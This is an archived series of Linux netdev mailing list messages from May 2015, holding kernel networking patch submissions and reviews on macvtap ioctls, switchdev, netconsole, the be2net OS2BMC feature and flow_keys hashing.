unsubscribe netdev in the body of a message to majord...@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html
Re: [PATCH v4] macvtap add missing ioctls - fix wrapping
From: Justin Cormack jus...@myriabit.com Date: Wed, 13 May 2015 11:06:01 +0100 On Tue, 2015-05-12 at 23:01 -0400, David Miller wrote: From: Justin Cormack jus...@myriabit.com Date: Mon, 11 May 2015 20:00:10 +0100 The macvtap driver tries to emulate all the ioctls supported by a normal tun/tap driver, however it was missing the generic SIOCGIFHWADDR and SIOCSIFHWADDR ioctls to get and set the mac address that are supported by tun/tap. This patch adds these. Signed-off-by: Justin Cormack jus...@netbsd.org Applied to net-next, thanks. The kbuild test picked up a stupid error, should I send a new patch version, or a patch against net-next? Patches are never removable from my tree, so you must always send relative fixes. -- To unsubscribe from this list: send the line unsubscribe netdev in the body of a message to majord...@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html
Re: [PATCH net-next] rename RTNH_F_EXTERNAL to RTNH_F_OFFLOAD
From: roopa ro...@cumulusnetworks.com Date: Wed, 13 May 2015 06:38:02 -0700 On 5/13/15, 1:26 AM, Daniel Borkmann wrote: On 05/13/2015 07:42 AM, Jiri Pirko wrote: Wed, May 13, 2015 at 07:27:10AM CEST, ro...@cumulusnetworks.com wrote: From: Roopa Prabhu ro...@cumulusnetworks.com RTNH_F_EXTERNAL today is printed as offload in iproute2 output. This patch renames the flag to be consistent with what the user sees. (I will post iproute2 patch if this gets accepted) Signed-off-by: Roopa Prabhu ro...@cumulusnetworks.com --- include/uapi/linux/rtnetlink.h |2 +- net/ipv4/fib_trie.c|2 +- net/switchdev/switchdev.c |6 +++--- 3 files changed, 5 insertions(+), 5 deletions(-) diff --git a/include/uapi/linux/rtnetlink.h b/include/uapi/linux/rtnetlink.h index 974db03..17fb02f 100644 --- a/include/uapi/linux/rtnetlink.h +++ b/include/uapi/linux/rtnetlink.h @@ -337,7 +337,7 @@ struct rtnexthop { #define RTNH_F_DEAD 1 /* Nexthop is dead (used by multipath) */ #define RTNH_F_PERVASIVE2/* Do recursive gateway lookup*/ #define RTNH_F_ONLINK4/* Gateway is forced on link*/ -#define RTNH_F_EXTERNAL8/* Route installed externally*/ +#define RTNH_F_OFFLOAD8/* offloaded route */ Since this is part of uapi, I believe this is not doable :/ i thought it was not too late :) and besides i wasn't changing the value and just the name. current iproute2 would still build for example. If it made it into a release kernel, you cannot change it. Period. -- To unsubscribe from this list: send the line unsubscribe netdev in the body of a message to majord...@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html
Re: [PATCH net-next 0/4] switchdev: more (minor) cleanups
From: sfel...@gmail.com Date: Tue, 12 May 2015 23:03:50 -0700 Fix some sparse warnings and include some documentation review comments that didn't get picked up in the switchdev Spring Cleanup series. Series applied, thanks Scott. -- To unsubscribe from this list: send the line unsubscribe netdev in the body of a message to majord...@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html
Re: [PATCH net-next] switchdev: don't use anonymous union on switchdev attr/obj structs
From: sfel...@gmail.com Date: Wed, 13 May 2015 11:16:50 -0700 From: Scott Feldman sfel...@gmail.com Older gcc versions (e.g. gcc version 4.4.6) don't like anonymous unions which was causing build issues on the newly added switchdev attr/obj structs. Fix this by using named union on structs. Signed-off-by: Scott Feldman sfel...@gmail.com Reported-by: Or Gerlitz ogerl...@mellanox.com Applied, thanks. -- To unsubscribe from this list: send the line unsubscribe netdev in the body of a message to majord...@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html
Re: [PATCH net-next] fix missing copy_from_user in macvtap
From: Justin Cormack jus...@myriabit.com Date: Wed, 13 May 2015 19:19:02 +0100 Fix missing copy_from_user in macvtap SIOCSIFHWADDR ioctl. Signed-off-by: Justin Cormack jus...@netbsd.org Applied. -- To unsubscribe from this list: send the line unsubscribe netdev in the body of a message to majord...@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html
Re: [PATCH 4/4] netconsole: implement extended console support
From: Tejun Heo t...@kernel.org Date: Wed, 13 May 2015 11:46:20 -0400 Hello, David. On Tue, May 12, 2015 at 07:23:22PM -0400, David Miller wrote: Second question, is there an upper bound on this header size? Because if there is, it seems to me that there is no reason why we can't just avoid the fragmentation support altogether. The current code limits to 1000 bytes, and that limit seems arbitrary. Obviously this code is meant to work on interfaces with an ethernet MTU or larger. So you could bump the limit enough to accomodate the new header size, yet still be within the real constraints. What do you think? Yeah, if we can bump the tx size enough to accomodate all messages, it'd be great. It can get fairly large tho. The absolute maximum right now is 8k. While regular prink message bodies are capped slightly below 1k, the dictionary printed through vprintk_emit() doesn't have such length limit. Another factor is that non-printables are escaped using \xXX and vprintk_emit() is supposed to be useable with transmitting binary data (like low level device error descriptors) although I'm not sure anybody is doing that yet. Yeah, 8K is too much to handle, oh well. Ok I'm fine with this series from my end, and you can merge this wherever the extended console support bits go. Signed-off-by: David S. Miller da...@davemloft.net Thanks. -- To unsubscribe from this list: send the line unsubscribe netdev in the body of a message to majord...@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html
[PATCH net-next 3/3] be2net: Support for OS2BMC.
OS2BMC feature will allow the server to communicate with the on-board BMC/idrac (Baseboard Management Controller) over the LOM via standard Ethernet. When OS2BMC feature is enabled, the LOM will filter traffic coming from the host. If the destination MAC address matches the iDRAC MAC address, it will forward the packet to the NC-SI side band interface for iDRAC processing. Otherwise, it would send it out on the wire to the external network. Broadcast and multicast packets are sent on the side-band NC-SI channel and on the wire as well. Some of the packet filters are not supported in the NIC and hence driver will identify such packets and will hint the NIC to send those packets to the BMC. This is done by duplicating packets on the management ring. Packets are sent to the management ring, by setting mgmt bit in the wrb header. The NIC will forward the packets on the management ring to the BMC through the side-band NC-SI channel. Please refer to this online document for more details, http://www.dell.com/downloads/global/products/pedge/ os_to_bmc_passthrough_a_new_chapter_in_system_management.pdf Signed-off-by: Venkat Duvvuru venkatkumar.duvv...@emulex.com --- drivers/net/ethernet/emulex/benet/be.h |8 ++- drivers/net/ethernet/emulex/benet/be_cmds.c | 19 drivers/net/ethernet/emulex/benet/be_cmds.h | 17 drivers/net/ethernet/emulex/benet/be_main.c | 138 +++ 4 files changed, 181 insertions(+), 1 deletions(-) diff --git a/drivers/net/ethernet/emulex/benet/be.h b/drivers/net/ethernet/emulex/benet/be.h index 63922d4..8d12b41 100644 --- a/drivers/net/ethernet/emulex/benet/be.h +++ b/drivers/net/ethernet/emulex/benet/be.h @@ -384,6 +384,7 @@ enum vf_state { #define BE_FLAGS_SETUP_DONEBIT(9) #define BE_FLAGS_EVT_INCOMPATIBLE_SFP BIT(10) #define BE_FLAGS_ERR_DETECTION_SCHEDULED BIT(11) +#define BE_FLAGS_OS2BMCBIT(12) #define BE_UC_PMAC_COUNT 30 #define BE_VF_UC_PMAC_COUNT2 @@ -428,6 +429,8 @@ struct be_resources { u32 vf_if_cap_flags;/* VF if capability flags */ }; +#define be_is_os2bmc_enabled(adapter) (adapter-flags BE_FLAGS_OS2BMC) + struct rss_info { u64 rss_flags; u8 rsstable[RSS_INDIR_TABLE_LEN]; @@ -461,7 +464,8 @@ enum { BE_WRB_F_LSO_BIT, /* LSO */ BE_WRB_F_LSO6_BIT, /* LSO6 */ BE_WRB_F_VLAN_BIT, /* VLAN */ - BE_WRB_F_VLAN_SKIP_HW_BIT /* Skip VLAN tag (workaround) */ + BE_WRB_F_VLAN_SKIP_HW_BIT, /* Skip VLAN tag (workaround) */ + BE_WRB_F_OS2BMC_BIT /* Send packet to the management ring */ }; /* The structure below provides a HW-agnostic abstraction of WRB params @@ -584,6 +588,8 @@ struct be_adapter { struct be_hwmon hwmon_info; u8 pf_number; struct rss_info rss_info; + /* Filters for packets that need to be sent to BMC */ + u32 bmc_filt_mask; }; #define be_physfn(adapter) (!adapter-virtfn) diff --git a/drivers/net/ethernet/emulex/benet/be_cmds.c b/drivers/net/ethernet/emulex/benet/be_cmds.c index dce8786..4115054 100644 --- a/drivers/net/ethernet/emulex/benet/be_cmds.c +++ b/drivers/net/ethernet/emulex/benet/be_cmds.c @@ -333,6 +333,21 @@ static void be_async_grp5_pvid_state_process(struct be_adapter *adapter, } } +#define MGMT_ENABLE_MASK 0x4 +static void be_async_grp5_fw_control_process(struct be_adapter *adapter, +struct be_mcc_compl *compl) +{ + struct be_async_fw_control *evt = (struct be_async_fw_control *)compl; + u32 evt_dw1 = le32_to_cpu(evt-event_data_word1); + + if (evt_dw1 MGMT_ENABLE_MASK) { + adapter-flags |= BE_FLAGS_OS2BMC; + adapter-bmc_filt_mask = le32_to_cpu(evt-event_data_word2); + } else { + adapter-flags = ~BE_FLAGS_OS2BMC; + } +} + static void be_async_grp5_evt_process(struct be_adapter *adapter, struct be_mcc_compl *compl) { @@ -349,6 +364,10 @@ static void be_async_grp5_evt_process(struct be_adapter *adapter, case ASYNC_EVENT_PVID_STATE: be_async_grp5_pvid_state_process(adapter, compl); break; + /* Async event to disable/enable os2bmc and/or mac-learning */ + case ASYNC_EVENT_FW_CONTROL: + be_async_grp5_fw_control_process(adapter, compl); + break; default: break; } diff --git a/drivers/net/ethernet/emulex/benet/be_cmds.h b/drivers/net/ethernet/emulex/benet/be_cmds.h index c713d51..2716e6f 100644 --- a/drivers/net/ethernet/emulex/benet/be_cmds.h +++ b/drivers/net/ethernet/emulex/benet/be_cmds.h @@ -105,6 +105,7 @@ struct be_mcc_compl { #define ASYNC_DEBUG_EVENT_TYPE_QNQ 1 #define ASYNC_EVENT_CODE_SLIPORT 0x11 #define
Re: [PATCH v3 net-next 1/5] net: Get skb hash over flow_keys structure
From: Tom Herbert t...@herbertland.com Date: Wed, 13 May 2015 15:37:50 -0400 On Wed, May 13, 2015 at 3:30 PM, David Miller da...@davemloft.net wrote: From: Tom Herbert t...@herbertland.com Date: Tue, 12 May 2015 08:22:58 -0700 @@ -15,6 +15,13 @@ * All the members, except thoff, are in network byte order. */ struct flow_keys { + u16 thoff; + u16 padding1; +#define FLOW_KEYS_HASH_START_FIELD n_proto + __be16 n_proto; + u8 ip_proto; + u8 padding; + This padding works if everyone consistently zero initializes the whole key structure, but for whatever reason (performance, unintentional oversight, etc.) not all paths do. So, for example, inet_set_txhash() is going to have random crap in keys.padding, so the hashes computed are not stable for a given flow key tuple. That's just the first code path I found with this issue, there are probably several others. memset zero is in the second patch for inet_set_txhash and ip6_set_txhash. I can respin so those are in the first patch. Yes, for bisectability you should probably do that. -- To unsubscribe from this list: send the line unsubscribe netdev in the body of a message to majord...@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html
Re: [patch net-next v3 00/15] introduce programable flow dissector and cls_flower
From: Tom Herbert t...@herbertland.com Date: Wed, 13 May 2015 15:27:59 -0400 I'm sure there will be some performance improvements possible, and I hope you will look into making sure this new programmable classifier is as light weight as possible. ... I still have concerns about making flow_dissector more complex like this. This still seems like it should this programmable logic be done in a separate function. We call flow_dissector at least once per packet via skb_get_hash, it is in the critical path, and adding several conditionals can only slow it down and provides no new value to skb_get_hash. At the very least can we at least get some performance numbers to show impact of this? The part of what I said to Jiri above is meant exactly to ensure that he handles this. If we need a specialized fast path for the skb_get_hash() code paths, so be it. But I'm not going to denouce his entire efforts for something that hasn't even been shown to be an issue yet. And if it is, I'm sure Jiri will work to address it. -- To unsubscribe from this list: send the line unsubscribe netdev in the body of a message to majord...@vger.kernel.org More majordomo info at http://vger.kernel.org/majordomo-info.html